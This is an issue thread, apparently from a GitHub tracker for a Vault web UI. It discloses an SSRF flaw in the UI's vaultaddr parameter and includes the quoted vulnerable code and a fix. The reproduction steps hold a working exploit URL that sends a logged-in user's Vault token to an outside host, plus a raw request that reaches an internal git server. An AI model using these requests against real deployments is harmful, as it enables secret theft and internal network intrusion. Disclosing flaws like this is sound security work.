Security issue. Token leakage

[anton00706]

Hi.
Our security team tested your UI and found a vulnerability.
Here is a feedback from them:

Step-to-reproduce
Token leakage:

1. Login to vault ui with token
2. visit http://spb-off-vault01.team.wrike.com:8000/v1/sys/capabilities-self?vaultaddr=http:%2F%2Fifyoucanyoucantest.pythonanywhere.com%2fexamples%2fsimple_examples%2fhello3.html%3f
3. Open file token.txt at 192.168.3.105

Access token stolen.

Internal resources access:

1. Disable VPN and send request
   GET /v1/sys/capabilities-self?vaultaddr=https:%2F%2Fgit.wrke.in HTTP/1.1
   Host: spb-off-vault01.team.wrike.com:8000
   ...

you got git.wrke.in content, but we assume, that attacker can no has access to it

Actual result
Token stolen, internal resources accessed

Expected result
No SSRF

Area of Responsibility
Other

Recommendation
Do not user input, take value of target host from configuration.

Currently in /src/vaultapi.js:
let vaultAddr = req.query.vaultaddr;

but should be something like this:
let vaultAddr =config['vaultaddr']

[ghost]

Soooo. any suggestions for another UI that's not this one @anton00706 ?

[JorisInsign]

@reverendtimm the official one ?
See https://www.hashicorp.com/resources/vault-oss-ui-introduction

[ghost]

@JorisInsign noice. Thanks.

[rptxcosmo]

• What is the status of this issue?
• Repro steps are not very clear.

[Bitblade]

There has been no response from a developer, nor has there been a commit since this issue was opened.

So at this point, I don't even care if the issue is real. (Though I think it is). Clearly using Vault-UI to access (company) secrets is a no-go.